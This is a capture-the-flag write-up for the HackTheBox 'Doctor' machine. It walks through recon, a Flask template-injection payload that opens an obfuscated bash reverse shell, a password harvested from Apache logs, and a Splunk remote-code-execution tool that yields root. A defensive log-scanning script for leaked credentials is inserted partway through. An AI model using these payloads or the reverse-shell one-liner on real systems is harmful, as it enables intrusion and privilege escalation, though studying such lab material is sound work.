HackTheBox: Doctor


Foothold

[jusepe@nix:~/Documents/HackTheBox/Doctor]$ sudo scan doctor.htb
[*] OS based on TTL
Unknown OS
[*] TCP Scan
Open ports: 22,80,8089
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 59:4d:4e:c2:d8:cf:da:9d:a8:c8:d0:fd:99:a8:46:17 (RSA)
|   256 7f:f3:dc:fb:2d:af:cb:ff:99:34:ac:e0:f8:00:1e:47 (ECDSA)
|_  256 53:0e:96:6b:9c:e9:c1:a1:70:51:6c:2d:ce:7b:43:e8 (ED25519)
80/tcp   open  http     Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Doctor
8089/tcp open  ssl/http Splunkd httpd
| http-robots.txt: 1 disallowed entry 
|_/
|_http-server-header: Splunkd
|_http-title: splunkd
| ssl-cert: Subject: commonName=SplunkServerDefaultCert/organizationName=SplunkUser
| Not valid before: 2020-09-06T15:57:27
|_Not valid after:  2023-09-06T15:57:27
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
[*] Execution time:
         TTL: 1
         Furious: 133
         Nmap: 38
         Total: 171

The main website looks like this:

Landing page

From there we can get a VHOST from the domain of the email addresses shown on the page (doctors.htb), then use ffuf to search for directories:

[jusepe@nix:~/Documents/HackTheBox/Doctor]$ ffuf -c -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://doctors.htb/FUZZ -t 150

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v1.2.0-git
________________________________________________

 :: Method           : GET
 :: URL              : http://doctors.htb/FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 150
 :: Matcher          : Response status: 200,204,301,302,307,401,403
________________________________________________

# on atleast 2 different hosts [Status: 302, Size: 237, Words: 22, Lines: 4]
#                       [Status: 302, Size: 237, Words: 22, Lines: 4]
# Copyright 2007 James Fisher [Status: 302, Size: 237, Words: 22, Lines: 4]
# This work is licensed under the Creative Commons [Status: 302, Size: 237, Words: 22, Lines: 4]
#                       [Status: 302, Size: 237, Words: 22, Lines: 4]
# Attribution-Share Alike 3.0 License. To view a copy of this [Status: 302, Size: 237, Words: 22, Lines: 4]
# license, visit http://creativecommons.org/licenses/by-sa/3.0/ [Status: 302, Size: 237, Words: 22, Lines: 4]
# or send a letter to Creative Commons, 171 Second Street, [Status: 302, Size: 237, Words: 22, Lines: 4]
#                       [Status: 302, Size: 237, Words: 22, Lines: 4]
#                       [Status: 302, Size: 237, Words: 22, Lines: 4]
# Priority ordered case sensative list, where entries were found [Status: 302, Size: 237, Words: 22, Lines: 4]
# Suite 300, San Francisco, California, 94105, USA. [Status: 302, Size: 237, Words: 22, Lines: 4]
# directory-list-2.3-medium.txt [Status: 302, Size: 237, Words: 22, Lines: 4]
                        [Status: 302, Size: 237, Words: 22, Lines: 4]
home                    [Status: 302, Size: 245, Words: 22, Lines: 4]
login                   [Status: 200, Size: 4204, Words: 1054, Lines: 95]
register                [Status: 200, Size: 4493, Words: 1171, Lines: 101]
archive                 [Status: 200, Size: 101, Words: 7, Lines: 6]
account                 [Status: 302, Size: 251, Words: 22, Lines: 4]
logout                  [Status: 302, Size: 217, Words: 22, Lines: 4]
                        [Status: 302, Size: 237, Words: 22, Lines: 4]
reset_password          [Status: 200, Size: 3493, Words: 752, Lines: 77]
server-status           [Status: 403, Size: 276, Words: 20, Lines: 10]
:: Progress: [220560/220560] :: Job [1/1] :: 150 req/sec :: Duration: [0:15:06] :: Errors: 0 ::

Additionally checked with Wappalyzer, which reports Flask running on the backend:

Wappalyzer

Then created an account and tested for SSTI (server-side template injection) with a new post:

SSTI Test

It didn't seem to work on the main webpage, but in /archive it ended up working:

Archive SSTI

Then just switched the payload for a reverse shell ({{config.__class__.__init__.__globals__['os'].popen('echo "YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNS4xOTMvODA4MCAwPiYxCg==" | base64 -d | bash').read()}})

User

Then checked whether the user I got a shell as belongs to any additional groups:

(remote) web@doctor:/home/web$ id
uid=1001(web) gid=1001(web) groups=1001(web),4(adm)

We are in the adm group, so we can read most logs; check them for sensitive data.

(remote) web@doctor:/var/log/apache2$ ls
access.log    access.log.10.gz  access.log.12.gz  access.log.3.gz  access.log.5.gz  access.log.7.gz  access.log.9.gz  error.log    error.log.10.gz  error.log.12.gz  error.log.14.gz  error.log.3.gz  error.log.5.gz  error.log.7.gz  error.log.9.gz
access.log.1  access.log.11.gz  access.log.2.gz   access.log.4.gz  access.log.6.gz  access.log.8.gz  backup           error.log.1  error.log.11.gz  error.log.13.gz  error.log.2.gz   error.log.4.gz  error.log.6.gz  error.log.8.gz  other_vhosts_access.log

Finally found a password in the backup file, which turned out to be shaun's password:

(remote) web@doctor:/var/log/apache2$ cat backup | grep pass
10.10.14.4 - - [05/Sep/2020:11:17:34 +2000] "POST /reset_password?email=Guitar123" 500 453 "http://doctor.htb/reset_password"
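The leak above is a classic one: a credential ended up in a query string (here, the value submitted to /reset_password), and query strings are written to the web server's access log, which anyone in adm can read. The following is an added example, not part of the original writeup, of a small log-review check a defender could run over Apache access logs to catch this pattern: it flags secret-looking parameter names in URLs and any query string at all on credential-handling endpoints. The sample log lines are constructed (the reset_password line is the one from the backup file above), and the parameter-name and endpoint lists are assumptions to tune per application.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Apache-style access log line: ip ident user [time] "METHOD target PROTO" status size ...
# The request part may lack the protocol (as in the "backup" file above), so PROTO is optional.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>[^\s"]+)(?: [^"]*)?" (?P<status>\d{3})'
)

# Parameter names that should never carry a secret in a URL (assumption: tune per app).
SECRET_PARAMS = {"password", "passwd", "pass", "pwd", "token", "secret", "api_key", "apikey"}

# Endpoints that handle credentials (assumption: tune per app). Any query string on them is
# suspicious: a form bug or a client mis-submitting a field puts the value straight into the log.
CREDENTIAL_ENDPOINTS = {"/login", "/register", "/reset_password"}

# Constructed sample log; line 2 is the entry found in the backup file on the box.
SAMPLE_LOG = [
    '10.10.14.4 - - [05/Sep/2020:11:17:31 +2000] "GET /login HTTP/1.1" 200 4204 "-"',
    '10.10.14.4 - - [05/Sep/2020:11:17:34 +2000] "POST /reset_password?email=Guitar123" 500 453 "http://doctor.htb/reset_password"',
    '10.10.14.4 - - [05/Sep/2020:11:18:02 +2000] "GET /api/items?token=abc123 HTTP/1.1" 200 88 "-"',
    '10.10.14.4 - - [05/Sep/2020:11:18:10 +2000] "GET /archive HTTP/1.1" 200 101 "-"',
]


def parse_line(line):
    """Parse one access log line into a dict with path and decoded query parameters, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    rec["params"] = parse_qsl(parts.query, keep_blank_values=True)
    return rec


def check_line(line):
    """Return a list of finding strings for one log line (empty if nothing suspicious)."""
    rec = parse_line(line)
    if rec is None:
        return []
    findings = []
    for name, _value in rec["params"]:
        if name.lower() in SECRET_PARAMS:
            findings.append(f"secret-looking parameter '{name}' in URL on {rec['path']}")
    if rec["path"] in CREDENTIAL_ENDPOINTS and rec["params"]:
        names = ",".join(n for n, _ in rec["params"])
        findings.append(
            f"query string ({names}) on credential endpoint {rec['path']} via {rec['method']}"
        )
    return findings


def scan(lines):
    """Map 1-based line number -> findings, only for lines that produced any."""
    results = {}
    for i, line in enumerate(lines, 1):
        findings = check_line(line)
        if findings:
            results[i] = findings
    return results


if __name__ == "__main__":
    for lineno, findings in scan(SAMPLE_LOG).items():
        for f in findings:
            print(f"line {lineno}: {f}")
```

The check only reports parameter names, never values, so its own output does not become a second copy of the leaked secret. The fix on the application side is to accept credentials only in request bodies (and to make sure the reset form cannot send a field as a query parameter); on the server side, keep log readership to the accounts that actually need it rather than the whole adm group, and do not leave copies of logs lying around under names like backup.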

Root

Since I managed to log in to Splunk with shaun's credentials, I used PySplunkWhisperer2 to execute commands on it:

[jusepe@nix:~/Documents/HackTheBox/Doctor/SplunkWhisperer2/PySplunkWhisperer2]$ python3 PySplunkWhisperer2_remote.py --host doctor.htb --port 8089 --username shaun --password "Guitar123" --payload "echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNS4xOTMvODA4MCAwPiYxCg== | base64 -d | bash" --lhost 10.10.15.193
Running in remote mode (Remote Code Execution)
[.] Authenticating...
[+] Authenticated
[.] Creating malicious app bundle...
[+] Created malicious app bundle in: /tmp/tmpbo837yso.tar
[+] Started HTTP server for remote mode
[.] Installing app from: http://10.10.15.193:8181/
10.10.10.209 - - [20/Jan/2021 14:56:34] "GET / HTTP/1.1" 200 -
[+] App installed, your code should be running now!

Press RETURN to cleanup

[.] Removing app...
[+] App removed
[+] Stopped HTTP server
Bye!

Listened for the reverse shell and just got root:

[jusepe@nix:~/Documents/HackTheBox/Doctor]$ pwncat -l -p 8080
[14:56:35] received connection from 10.10.10.209:37646                                                                            connect.py:255
[14:56:36] new host w/ hash 6ad4902a8d02bf576f6539e93bb74a2e                                                                       victim.py:321
[14:56:39] pwncat running in /usr/bin/bash                                                                                         victim.py:354
[14:56:41] pwncat is ready 🐈                                                                                                      victim.py:771

(remote) root@doctor:/$ id
uid=0(root) gid=0(root) groups=0(root)
WRITTEN BY
ITasahobby
InTernet lover